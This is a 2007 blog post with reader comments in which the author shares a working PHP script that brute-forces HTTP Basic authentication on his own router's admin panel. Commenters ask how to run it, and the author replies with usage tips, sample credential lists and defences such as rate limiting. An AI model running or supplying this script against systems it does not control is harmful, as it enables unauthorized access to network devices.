Wed, 28 Nov 2007
Hacking into my router by brute-forcing http authentication
I forgot the username and password to access the web panel of my router.
Luckily I knew some possible usernames and some patterns that I could have used to construct my password, so I just had to try all the combinations... Too much work to do manually but easily done when scripted.
Here is the php script that I came up with. (obviously stripped of my personal stuff). It got my account in less then a second :)
::Read from here
DISCLAIMER: Don't use this code for anything illegal! I'm not responsible for what you do with this!
<?php
$host = '';
$port = '';
$url = '/';
$users = array();
$passes = array();
tryme($host,$url,$port);
foreach($users as $user) {
foreach($passes as $pass) {
tryme($host,$url,$port,$user,$pass);
}
}
function tryme($host,$url = '/',$port = 80, $user = null,$pass =null ) {
$result="FAIL";
if(tryAccess($host,$url,$port, $user,$pass)) $result="SUCCESS";
if($user && $pass) $userpass = "user $user pass $pass ";
else $userpass = " without username & password";
echo("Tried $userpass > $result\n");
}
function tryAccess($host,$url = '/',$port = 80, $user = null,$pass =null) {
$fp = @fsockopen ($host, $port, &$errno, &$errdesc);
if (!is_resource ($fp)) {
echo("Could't not open socket to server: $errno - $errdesc\n");
return false;
}
@fputs ($fp, "POST $url HTTP/1.1\r\n");
@fputs ($fp, "Host: $host\r\n");
@fputs ($fp, "Connection: close\r\n");
if($user && $pass) {
@fputs ($fp, "Authorization: Basic " . base64_encode ("$user:$pass") . "\r\n");
}
@fputs($fp,"\r\n");
$reply = '';
$success = true;
while (!@feof ($fp)) {
$line = @fgets ($fp, 1024);
if(strpos($line,'401 Unauthorized')) $success = false;
$reply .= $line;
}
@fclose ($fp);
return $success;
}
?>
posted on Wednesday, 28 Nov 2007 22:11 - link - tags: php - path: / - 32 comments
Comments
Posted by Lieven on Thu Nov 29 03:32:30 2007
Yes, my router has a password reset functionality, but then I would need to search my null-modem cable (because it's via a serial interface), go downstairs, connect my laptop, figure out the serial settings ( I always forget them), ...
It's so much more fun to leave my laptop and lazy ass where they belong and hack a script together and learn something from it :-)
About the brute force protection, it seems like it doesn't have any, which is okay for me since it only listens on the LAN (and runs on a custom port).
Posted by Dieter_be on Fri Nov 30 09:13:00 2007
I just found out there is a new version of the software which supports doing a full reset triggered by a hardware button, but then I lose all my settings (which I can restore because I have backups :-) but this would also mean my internet connection has to go down for a while ...
And my initial point - the coolness factor and the educational value - remains ;-)
Posted by Dieter_be on Sat Dec 1 11:14:00 2007
Hey, sorry ima being abit thick how would you modify this to work to crack your passwords?
please explain a litte?
Thanks,
Dan
Posted by Dan on Thu Jan 3 20:42:22 2008
The key is filling the $users and $passes arrays ( or if they are really big then change how the looping works so you don't waste your ram )
Posted by Dieter_be on Sat Jan 12 05:46:27 2008
I recently had the same sort of problem. My router is inside a sort of hole in my roof, and I forgot the password. I haven't needed to access it for any reasons lately, but it would be nice to get back in. I have NO idea what it was. So is there a way for it to just test all possible solutions but having it connect together letters from the alphabet?
Also how do you use this script?
Posted by Anonymous on Mon Apr 14 12:53:49 2008
what router do you use?
Posted by Anonymous on Sat Jul 12 12:38:50 2008
It's a little embedded box, based on the pc engines WRAP 1E-2 board, running m0n0wall. (but this trick works on any device that uses http authentication)
@ the other anonymous commenter: it's a php script. save it as a file and run it as
php filename.phpPosted by Dieter_be on Mon Jul 14 16:06:42 2008
Could you tell what to change for the passes Array()? I dont fully understand php, but I do wanna access my router again!
Posted by Anonymous on Sat Nov 29 08:34:27 2008
ya dude...
how do u actually use the script
Posted by Anonymous on Sat Dec 27 13:49:22 2008
Anonymous 1: Well I don't know how you construct your passwords... whether you use a fixed string, a random one, a combination thereof etc. You obviously need to know a little php.
Anonymous 2: Run it from the php command-line. (/usr/bin/php)
Posted by Dieter_be on Tue Dec 30 09:11:31 2008
The password losing cases are common when you just tend to forget your password. In the scenarios where you use the login frequently you tend to remember but when you have a break for many days you need to have it written somewhere.
Also I have realized pre storing the password for logins is not really good idea, as you just keep logging in becasue the system knows the details but due to any reason if you are required to retype it, it is a problem..
my experience with passwords.
Posted by Medical Terminology on Tue Mar 3 05:35:13 2009
I was wondering if a hacker or any of my assistants could use this to get into my router, I have not provided them the access due to critical information but always be concerned if I am safe with my router?
Posted by Animaroo on Mon Mar 30 05:05:18 2009
Thanks for sharing was very useful.. I run a web company and have many routers to handle.
Posted by Vancouver Website Design on Sun Apr 5 05:33:40 2009
I think you shouldn't have shared this script.. the script might reach the wrong hands.. :(
Posted by Credit card Applciation on Sat Jun 6 00:23:44 2009
That's a bit worrying how easy it could be to hack into other peoples routers. Any advise on how to make it more secure?
Posted by Quadrant vans on Wed Jun 24 06:11:55 2009
1) rate limiting: only allow max 4 requests in a 5 minute time span or so.
2) if you only login from one of the networks (eg the LAN), only expose the interface on the relevant subnet/port.
Most consumer routers support option 2 , but not option 1.
Posted by Dieter_be on Sun Jun 28 09:28:09 2009
Can you give me a step by step on how to hack into a router.
I am new at this and I would like to learn.
Thanks
Posted by A.C. on Sun Sep 6 15:25:03 2009
Losing your password is common. I realized that storing the password for logins is not a good idea, as you just keep logging in because the system knows the details, but if for any reason you are required to retype it, this is going to be a problem.
my 2 cents about passwords lost.
Posted by Vanessa Rousso on Sun Nov 8 22:27:37 2009
for those who can't understand this...
$users = array('admin','admin2');
$passes = array('password','password2');
etc....etc...
Posted by Anonymous on Sat Jun 5 03:38:25 2010
How do you actually put this script into effect. What do i need to do with the script in order to activate it and crack the password and username
Posted by Anonymous on Thu Jul 29 01:52:07 2010
Posted by Agence titres services on Sun Feb 17 00:26:55 2013
Posted by marijuana medicine on Mon Apr 1 07:38:59 2013
Posted by Cherie on Sat May 11 01:36:56 2013
Posted by stretch on Sat May 11 01:37:26 2013
Posted by Nick on Sat May 11 01:37:49 2013
Posted by Alexia on Sat May 11 01:38:14 2013
Posted by Blthea on Sat May 11 01:38:37 2013
Posted by Anastasia on Sat May 11 01:39:28 2013
Posted by Angela on Sat May 11 01:39:59 2013
Posted by Bntonia on Sat May 11 01:40:48 2013
Posted by April on Sat May 11 01:41:19 2013
On most (if not all) routers, there's a way to reset it to factory settings though.. For routers that have defense mechanisms against brute force attacks (why does'nt yours?), that's the only way to do it.